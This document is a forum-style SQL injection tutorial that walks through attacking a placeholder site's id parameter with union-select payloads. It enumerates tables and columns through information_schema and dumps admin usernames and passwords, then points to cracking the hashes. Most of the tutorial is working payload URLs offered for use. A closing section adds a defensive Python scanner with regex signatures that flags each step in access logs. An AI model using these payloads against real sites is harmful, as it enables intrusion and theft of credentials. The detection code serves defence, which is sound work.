SQL Injection Tutorial

There are many types of SQL injection, but in this tutorial I will explain how you can extract the columns and tables that contain useful data such as passwords, user IDs, emails, admin passwords and IDs, etc.

Exploiting The Vulnerability

Now say we have found a vulnerable site. Add a single quote (') at the end of the URL; if the page returns with an
error message, then the site is vulnerable.


Example:-
www.vulnerable-site.net/articles.php?id=1'



Now we need to find the number of columns in the current table.
For this we use the "order by" command: add order by 1--
to the end of the URL, then increase the number until we get an error message.


Example:-
www.vulnerable-site.net/articles.php?id=1 order by 1--

www.vulnerable-site.net/articles.php?id=1 order by 2--

www.vulnerable-site.net/articles.php?id=1 order by 3--

www.vulnerable-site.net/articles.php?id=1 order by 4--

www.vulnerable-site.net/articles.php?id=1 order by 5--

And so on until we get an error message.


Say we get an error message when we enter order by 5--.
Then the number of columns in the current table is 4.


Now we use the "union all select" command to find the vulnerable column.
Add union all select followed by the numbers 1 up to the column count we found in the last step.


Example:-
www.vulnerable-site.net/articles.php?id=1 union all select 1,2,3,4--


Now we should see some numbers popping out on the page.
Say we see the number 3; then column 3 is the vulnerable one.



We can find the database version, name and user. We do this by replacing the vulnerable column number with one of the following:

user(), database(), version(), @@user, @@version, @@database

First we find the version of MySQL: we add "@@version" in place of the vulnerable column.


Example:-
www.vulnerable-site.net/articles.php?id=1 union all select 1,2,@@version,4--


Now the MySQL version should appear where the number popped out in the previous step. If it is version 5 or above, continue reading. If it is 4 or below, you have to brute force or guess the table and column names.

Now we need to find all the table names in the database. To do this we use the following:


table_name, information_schema.tables


Example:- 
www.vulnerable-site.net/articles.php?id=1 union all select 1,2,table_name,4 from information_schema.tables--


Remember that "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information, such as admin, member or user tables.


Now we must find all the column names in the database. To do this we use the command "group_concat(column_name)".


Example:-
www.vulnerable-site.net/articles.php?id=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns--

Now look for interesting names such as username, id, email and password.


Finally we need to dump the data from the columns of the tables we found.
For this we again use the group_concat command.
Say we want to get the "user id", "username" and "password" fields from the table "admin"; we use group_concat as follows:
  

Example:-
www.vulnerable-site.net/articles.php?id=1 union all select 1,2,group_concat(`user id`,0x3a,username,0x3a,password),4 from admin--

If the command is successful, we should see the user id, username and password, for example:


Example:-
1. admin:pass
2. user:password


Most of the time the passwords are encrypted; to crack them, refer to my posts on Hashes and Salts.
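From the defender's side, the probing sequence above (a stray quote, order by counting, union select, reads of information_schema, a group_concat dump) is easy to recognise in web-server access logs. The following scanner is an added example, not part of the original post: it decodes each request's query string, matches one signature per step, and reports for every client IP how far along the sequence it got. The log lines and IP addresses are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlparse

# One pattern per step of the sequence described above (in order), matched against each request's decoded query string.
SIGNATURES = [
    ("quote_probe",   re.compile(r"'\s*$")),                          # trailing ' to provoke an error
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+", re.I)),        # column counting
    ("union_select",  re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("version_probe", re.compile(r"@@version|\bversion\s*\(\s*\)", re.I)),
    ("schema_read",   re.compile(r"\binformation_schema\.", re.I)),    # table/column enumeration
    ("group_concat",  re.compile(r"\bgroup_concat\s*\(", re.I)),       # data dump
]
# Common log format: ip ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(path):
    """Return the labels of every signature that matches one request's decoded query string."""
    decoded = unquote_plus(urlparse(path).query)
    return [label for label, rx in SIGNATURES if rx.search(decoded)]

def furthest_stage(labels):
    """1-based index of the latest sequence step present in labels; 0 if none."""
    order = [label for label, _ in SIGNATURES]
    return max((order.index(l) + 1 for l in labels), default=0)

def scan_log(lines):
    """Aggregate matches per client IP: {ip: {"hits": n, "labels": set, "stage": k}}."""
    per_ip = defaultdict(lambda: {"hits": 0, "labels": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format; skip
        labels = classify_request(m.group("path"))
        if labels:
            per_ip[m.group("ip")]["hits"] += 1
            per_ip[m.group("ip")]["labels"].update(labels)
    return {ip: {**e, "stage": furthest_stage(e["labels"])} for ip, e in per_ip.items()}

# Constructed sample log: one client walking the tutorial's steps, one ordinary visitor.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /articles.php?id=1 HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /articles.php?id=1\' HTTP/1.1" 500 412',
    '203.0.113.5 - - [10/Oct/2023:13:55:51 +0000] "GET /articles.php?id=1%20order%20by%201-- HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /articles.php?id=1%20order%20by%205-- HTTP/1.1" 500 412',
    '203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /articles.php?id=1%20union%20all%20select%201,2,@@version,4-- HTTP/1.1" 200 5200',
    '203.0.113.5 - - [10/Oct/2023:13:57:01 +0000] "GET /articles.php?id=1%20union%20all%20select%201,2,table_name,4%20from%20information_schema.tables-- HTTP/1.1" 200 9870',
    '203.0.113.5 - - [10/Oct/2023:13:57:40 +0000] "GET /articles.php?id=1%20union%20all%20select%201,2,group_concat(column_name),4%20from%20information_schema.columns-- HTTP/1.1" 200 12044',
    '198.51.100.7 - - [10/Oct/2023:13:57:05 +0000] "GET /articles.php?id=42 HTTP/1.1" 200 4990',
]
```

Running scan_log(SAMPLE_LOG) reports only 203.0.113.5, with six flagged requests and stage 6 (every step of the sequence seen); the ordinary visitor produces no entry. A 500 status on a quote probe followed by order by enumeration from the same IP is the point at which an alert is worth raising, before any data leaves the database.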
